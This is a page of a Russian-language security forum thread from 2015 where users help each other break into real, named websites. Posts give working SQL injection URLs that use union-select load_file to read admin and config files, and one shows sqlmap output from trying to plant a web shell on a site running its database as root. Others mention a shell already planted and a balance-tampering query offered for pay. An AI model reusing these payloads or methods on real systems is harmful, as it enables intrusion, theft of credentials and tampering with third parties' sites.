HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 71 из 296 « Первая < 2161 67 68 69 70 71 72 73 74 75 81121171 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #701  
Старый 17.10.2015, 20:51
Kirza
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию
Цитата:
Сообщение от yarbabin  
yarbabin said:

update adtram_users set count_rur = * where id=*
почемут не получилось(

Если прав нет и не получится так понимаю.? и есть ли возможность их получить*

Это тизерка. За помощь дам фтп . тоесть на 2их будет
 
Ответить с цитированием

  #702  
Старый 17.10.2015, 21:00
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию
уточните все условия
 
Ответить с цитированием

  #703  
Старый 17.10.2015, 21:05
Kirza
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию
Цитата:
Сообщение от yarbabin  
yarbabin said:

уточните все условия
+ Не заметил.

!!!!!!!!
 
Ответить с цитированием

  #704  
Старый 18.10.2015, 01:02
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию
Цитата:
Сообщение от Br@!ns  
Br@!ns said:

вот вам раскрытие, с соседней сайта. лучше смотрите
http://media-monitor.ru/admin
www.direct-line.ru/news_win.php?id=-2170
union select 1,load_file('/var/www/localhost/htdocs/media-monitor.ru/www/admin.php'),3,4--
http://www.direct-line.ru/news_win.php?id=-2170 union select 1,load_file('/var/www/localhost/htdocs/media-monitor.ru/www/kernel/cfg/config.php'),3,4--
или под ваш ресурс поулчается -
http://www.direct-line.ru/news_win.php?id=-2170 union select 1,load_file('/var/www/localhost/htdocs/direct-line.ru/www/index.php'),3,4--
я СОСЕДНИЙ САЙТ ТОЖЕ СМОТРЕЛ.

/var/www/localhost/htdocs/media-monitor.ru/www/

/var/www/localhost/htdocs/media-monitor.ru/www/kernel/ такой путь догадка была ?
 
Ответить с цитированием

  #705  
Старый 18.10.2015, 07:37
RedFern.89
Постоянный
Регистрация: 20.01.2010
Сообщений: 338
Провел на форуме:
500264

Репутация: 69
Отправить сообщение для RedFern.89 с помощью ICQ
По умолчанию
Цитата:
Сообщение от AlexG  
AlexG said:

Проверить по понятным причинам не могу, да и такой метод в реальности еще ни разу не эксплуатировал.
все работает, спасибо. осталось лишь автоматизировать
 
Ответить с цитированием

  #706  
Старый 18.10.2015, 08:30
AlexG
Guest
Сообщений: n/a
Провел на форуме:
11344

Репутация: 5
По умолчанию
Цитата:
Сообщение от RedFern.89  
RedFern.89 said:

все работает, спасибо. осталось лишь автоматизировать
Ну раз работает, то это уже хорошо По автоматизации, как выше уже сказал yarbabin - php или другой яп. Я взял бы за основу какой-нибудь HTML-парсер и засунул его в цикл.
 
Ответить с цитированием

  #707  
Старый 18.10.2015, 08:50
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640

Репутация: 0
По умолчанию
Цитата:
Сообщение от aldemko  
aldemko said:

С предыдущей ситуацией разобрался - доступ к php админу получен - пароль к сожалению оказался простым. дальше интерес к тому ресурсу исчерпан
Я начал искать новые ресурсы для обучения и практики
и так ресурс:
http://www.aza.com.ua
phpinfdo
http://www.aza.com.ua/info.php
страница с раскрытием пути
http://www.aza.com.ua/email/mail_form_short.html
немного о сервере
web server operating system: Windows
web application technology: Apache 2.2.21, PHP 5.2.17
back-end DBMS: MySQL 5.0
current user: 'root@localhost'
current database: 'test'
current user is DBA: True
uniscan по ключу --qwe
показывает (если я правильно понял) папки с правами на запись
| Directory check:
| [+] CODE: 200 URL:
http://www.aza.com.ua/banner/
| [+] CODE: 200 URL:
http://www.aza.com.ua/cart/
| [+] CODE: 200 URL:
http://www.aza.com.ua/conf/
| [+] CODE: 200 URL:
http://www.aza.com.ua/doc/
| [+] CODE: 200 URL:
http://www.aza.com.ua/email/
| [+] CODE: 200 URL:
http://www.aza.com.ua/edit/
| [+] CODE: 200 URL:
http://www.aza.com.ua/images/
| [+] CODE: 200 URL:
http://www.aza.com.ua/img/
| [+] CODE: 200 URL:
http://www.aza.com.ua/japan/
| [+] CODE: 200 URL:
http://www.aza.com.ua/news/
| [+] CODE: 200 URL:
http://www.aza.com.ua/orders/
| [+] CODE: 200 URL:
http://www.aza.com.ua/pma/
| [+] CODE: 200 URL:
http://www.aza.com.ua/quest/
| [+] CODE: 200 URL:
http://www.aza.com.ua/user/
затем используя sqlmap-u сайт --os-cmd –v l
выбираю 4 (php)
затем на запрос куда лить - указываю адрес (судя с
http://www.aza.com.ua/email/mail_form_short.html
) D:\Sites\home\aza.com.ua\htdocs\ и подставляю по очередно папки из данных Uniscana - но увы ответ приходит один и тот же:
Код:
Code:
please provide a comma separate list of absolute directory paths: D:\Sites\home\aza.com.ua\htdocs\email\
[22:27:14] [WARNING] unable to automatically parse any web server path
[22:27:14] [INFO] trying to upload the file stager on '/Sites/home/aza.com.ua/htdocs/email/' via LIMIT 'LINES TERMINATED BY' method
[22:27:15] [INFO] heuristics detected web page charset 'MacCyrillic'
[22:27:17] [WARNING] unable to upload the file stager on '/Sites/home/aza.com.ua/htdocs/email/'
[22:27:17] [INFO] trying to upload the file stager on '/servis/' via LIMIT 'LINES TERMINATED BY' method
[22:27:19] [WARNING] unable to upload the file stager on '/servis/'
[22:27:19] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 8 times
[22:27:19] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.aza.com.ua'
подскажите что я не так делаю ?
Проблема в пути который указываю в sqlmap
или в том что статус 200 в uniscan Не имеет в виду что права на запись есть
или еще что то ?
спасибо
Шелл туда давно уже залит)

/threads/21336/page-796#post-3820554
 
Ответить с цитированием

  #708  
Старый 18.10.2015, 09:14
aldemko
Guest
Сообщений: n/a
Провел на форуме:
12627

Репутация: 0
По умолчанию
я понимаю что залит

я хочу тоже залить

и спросил в чем моя ошибка а не в том что есть люди которые уже залили

у меня не получается и я расписал действия свои - просто хочу узнать в чем ошибка у меня
 
Ответить с цитированием

  #709  
Старый 18.10.2015, 11:51
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640

Репутация: 0
По умолчанию
Цитата:
Сообщение от aldemko  
aldemko said:

я понимаю что залит
я хочу тоже залить
и спросил в чем моя ошибка а не в том что есть люди которые уже залили
у меня не получается и я расписал действия свои - просто хочу узнать в чем ошибка у меня
Пробуй заливать руками, а не софтом, ищи папку с правами, например папка с картинками.
 
Ответить с цитированием

  #710  
Старый 18.10.2015, 14:09
Roger96
Guest
Сообщений: n/a
Провел на форуме:
5139

Репутация: 0
По умолчанию
Здравствуйте,вопрос в следующем, я правильно понимаю,что чтобы залить шелл надо иметь доптуп к админке а соответственно знать логин пасс, дак ведь их можно узнать только через уязвимость а если у меня будет такая уязвимость значит я смогу и слить базу соответственно зачем мне уже заливать шелл дак вот вопрос заключается в следующем: как залить шелл незная логина и пароля админа?
 
Ответить с цитированием
Ответ
Страница 71 из 296 « Первая < 2161 67 68 69 70 71 72 73 74 75 81121171 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ